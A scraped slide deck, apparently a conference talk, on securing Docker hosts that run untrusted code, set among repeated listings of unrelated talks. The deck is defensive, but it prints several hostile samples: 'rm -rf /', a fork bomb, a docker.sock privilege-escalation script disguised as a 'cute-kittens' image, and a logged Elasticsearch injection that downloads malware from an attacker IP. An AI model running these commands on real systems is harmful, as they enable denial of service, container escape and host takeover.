The Art of Documentation and Readme.md for Open Source Projects
The Art of Documentation and Readme.md for Open Source ProjectsThe Art of Documentation and Readme.md for Open Source Projects
The Art of Documentation and Readme.md for Open Source Projects
 
How Secure Are Docker Containers?
How Secure Are Docker Containers?How Secure Are Docker Containers?
How Secure Are Docker Containers?
 
The Challenges of Becoming Cloud Native
The Challenges of Becoming Cloud NativeThe Challenges of Becoming Cloud Native
The Challenges of Becoming Cloud Native
 
Scaling Docker Containers using Kubernetes and Azure Container Service
Scaling Docker Containers using Kubernetes and Azure Container ServiceScaling Docker Containers using Kubernetes and Azure Container Service
Scaling Docker Containers using Kubernetes and Azure Container Service
 
The art of documentation and readme.md
The art of documentation and readme.mdThe art of documentation and readme.md
The art of documentation and readme.md
 
Experimenting and Learning Kubernetes and Tensorflow
Experimenting and Learning Kubernetes and TensorflowExperimenting and Learning Kubernetes and Tensorflow
Experimenting and Learning Kubernetes and Tensorflow
 
Real World Lessons On The Anti-Patterns of Node.JS
Real World Lessons On The Anti-Patterns of Node.JSReal World Lessons On The Anti-Patterns of Node.JS
Real World Lessons On The Anti-Patterns of Node.JS
 
Learning to think "The Designer Way"
Learning to think "The Designer Way"Learning to think "The Designer Way"
Learning to think "The Designer Way"
 

Recently uploaded

Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
Frank van Harmelen
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 

Recently uploaded (20)

Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 

Lessons from running potentially malicious code inside Docker containers

  • 1. Lessons from running potentially malicious code inside containers @Ben_Hall Ben@BenHall.me.uk Ocelot Uproar / Scrapbook
  • 2. @Ben_Hall / Blog.BenHall.me.uk Tech Support > Tester > Developer > Founder / Freelancer Software Development Studio WHOAMI?
  • 3. “What happens when you give anonymous unrestricted access to a hosted Docker container & daemon?” This is how we [try to] protect ourselves
  • 5.
  • 6. Multi-tenant system PaaS CI Servers Untrusted 3rd Parties Docker Security Practices
  • 7.
  • 9. $ whoami $ pwd $ cd / $ ls $ apt-get install <some package> $ passwd $ rm –rf /
  • 10.
  • 11. Dockerfile RUN adduser <new user> USER <new user> $ docker run –u <new user>
  • 12. $ uptime $ free -m $ df -h $ cat /proc/cpuinfo
  • 13.
  • 14. If you can ping it, you can try to hack it --icc=false $ cat /etc/hosts 172.17.9.121 st_undefined_x7gd_RrD04w81FSQAANX 172.17.0.220 the-warden.bridge 172.17.9.118 st_nkxqyj_d2d.bridge 172.17.9.119 st_4jm1qk_d2d0 172.17.9.106 angry_blackwell
  • 16.
  • 17. “It also allows the container to access local network services + like D-bus and is therefore considered insecure” $ docker run --net=host -it ubuntu bash root@ubuntu:/# shutdown now root@ubuntu:/# $ docker run --net=host -it ubuntu bash Post http://docker:4243/v1.20/containers/create: EOF. * Are you trying to connect to a TLS-enabled daemon without TLS? * Is your docker daemon up and running?
  • 18. Docker provides a lot out of the box but not everything…
  • 20. :(){ :|: & };:
  • 21. $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 Error response from daemon: Cannot start container efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 : [8] System error: resource temporarily unavailable
  • 22. $ while :; do echo 'Hello World'; done
  • 23. $ fallocate Operation Not Supported $ truncate $ dd
  • 24. Root users can write to it. If you can write to it, you can fill it. $ ls /docker/aufs/diff/<container-id>/ $ cat /docker/containers/<container-id>/hosts
  • 25. Docker & IPTables provides inbound restrictions
  • 29. $ docker diff $ ~/.bash_history
  • 30.
  • 31. Sysdig Very powerful. A lot of data. Built separate auditing service logging commands from users
  • 32. The Warden Based on Docker Stats API Snort for Docker?
  • 33. A lot more… • Privileged containers open up a world of pain • setuid / setgid • IPTables=false • docker.sock opens a lot of doors • Docker Images containing “presents”
  • 34. $ docker run benhall/cute-kittens Error: Missing docker.sock Usage: docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens $ docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens
  • 35. if [ -e /var/run/docker.sock ]; then echo "**** Launching ****” docker run --privileged busybox ls /dev echo "**** Cute kittens ****" else echo "Error: Missing docker.sock” fi
  • 36. What happens when it all goes wrong?
  • 38.
  • 39.
  • 40. org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"s cript":"import java.util.*;nimport java.io.*;nString str = "";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("wget -O /tmp/xdvi http://<IP Address>:9985/xdvi").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();" }}}]] http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
  • 41. C /bin C /bin/netstat C /bin/ps C /bin/ss C /etc C /etc/init.d A /etc/init.d/DbSecuritySpt A /etc/init.d/selinux C /etc/rc1.d A /etc/rc1.d/S97DbSecuritySpt A /etc/rc1.d/S99selinux C /etc/rc2.d A /etc/rc2.d/S97DbSecuritySpt A /etc/rc2.d/S99selinux C /etc/rc3.d A /etc/rc3.d/S97DbSecuritySpt A /etc/rc3.d/S99selinux C /etc/rc4.d A /etc/rc4.d/S97DbSecuritySpt A /etc/rc4.d/S99selinux C /etc/rc5.d http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/ A /etc/rc5.d/S97DbSecuritySpt A /etc/rc5.d/S99selinux C /etc/ssh A /etc/ssh/bfgffa A /os6 A /safe64 C /tmp A /tmp/.Mm2 A /tmp/64 A /tmp/6Sxx A /tmp/6Ubb A /tmp/DDos99 A /tmp/cmd.n A /tmp/conf.n A /tmp/ddos8 A /tmp/dp25 A /tmp/frcc A /tmp/gates.lod A /tmp/hkddos A /tmp/hsperfdata_root A /tmp/linux32 A /tmp/linux64 A /tmp/manager A /tmp/moni.lod A /tmp/nb A /tmp/o32 A /tmp/oba A /tmp/okml A /tmp/oni A /tmp/yn25 C /usr C /usr/bin A /usr/bin/.sshd A /usr/bin/dpkgd A /usr/bin/dpkgd/netstat A /usr/bin/dpkgd/ps A /usr/bin/dpkgd/ss
  • 42. Is Docker Secure? • Yes. It’s as secure as your practices are. • ElasticSearch hack would have taken over entire box • I’ve pointed out the bad bits • New game, new rules to play by.

Editor's Notes

  1. Docker doesn’t support Kernel Virtualisation… hence information from host kernel is leaked
  2. https://github.com/docker/docker/pull/11405 https://github.com/docker/docker/issues/12071 https://github.com/docker/docker/issues/15617
  3. User namespaces in 1.9 removes net=host https://github.com/dotcloud/docker/issues/6401
  4. :(){ :|:& };: \_/| |||| ||\- ... the function ':', initiating a chain-reaction: each ':' will start two more. | | |||| |\- Definition ends now, to be able to run ... | | |||| \- End of function-block | | |||\- disown the functions (make them a background process), so that the children of a parent | | ||| will not be killed when the parent gets auto-killed | | ||\- ... another copy of the ':'-function, which has to be loaded into memory. | | || So, ':|:' simply loads two copies of the function, whenever ':' is called | | |\- ... and pipe its output to ... | | \- Load a copy of the function ':' into memory ... | \- Begin of function-definition \- Define the function ':' without any parameters '()' as follows:
  5. User namespaces in 1.9 removes net=host https://github.com/dotcloud/docker/issues/6401
  6. https://github.com/docker/docker/pull/11485
  7. https://github.com/docker/docker/issues/3804
  8. User namespaces in 1.9 removes net=host https://github.com/dotcloud/docker/issues/6401
  9. Docker & IPTables allows you some restrictions By-passed via NGrok / reverse proxies. Any Command & Control approaches
  10. Inbound – Waste bandwidth. Seed files. Outbound – DDoS, BitTorrent, Tor Relays, VPN… Lots of potential legal issues
  11. Monitors a containers CPU Usage, Disk Space & Bandwidth Sits on each local server. Means it will have priority thanks to CPU share. Communicates over unix socket so no bandwidth issues
  12. https://github.com/jerbia/container_hack